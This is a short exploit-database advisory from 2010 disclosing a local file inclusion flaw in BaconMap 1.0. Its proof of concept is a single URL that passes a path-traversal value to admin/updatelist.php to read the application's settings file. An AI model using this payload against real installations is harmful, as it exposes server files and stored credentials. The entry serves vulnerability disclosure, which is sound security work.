id: 14434
date: 10/12/2010
title: BaconMap v1.0 Local File Disclosure Vulnerability
author: John Leitch
cves: 

=================================================
BaconMap v1.0 Local File Disclosure Vulnerability
=================================================

Software................BaconMap 1.0
Vulnerability...........Local File Inclusion
Download................http://baconmap.nmsu.edu/
Release Date............10/10/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
 
--Description--
 
A local file inclusion vulnerability in BaconMap 1.0 can be exploited
to include arbitrary files.
 
 
--PoC--
 
http://localhost/baconmap/admin/updatelist.php?filepath=../includes/settings.php



#  0day.today [2023-03-23]  #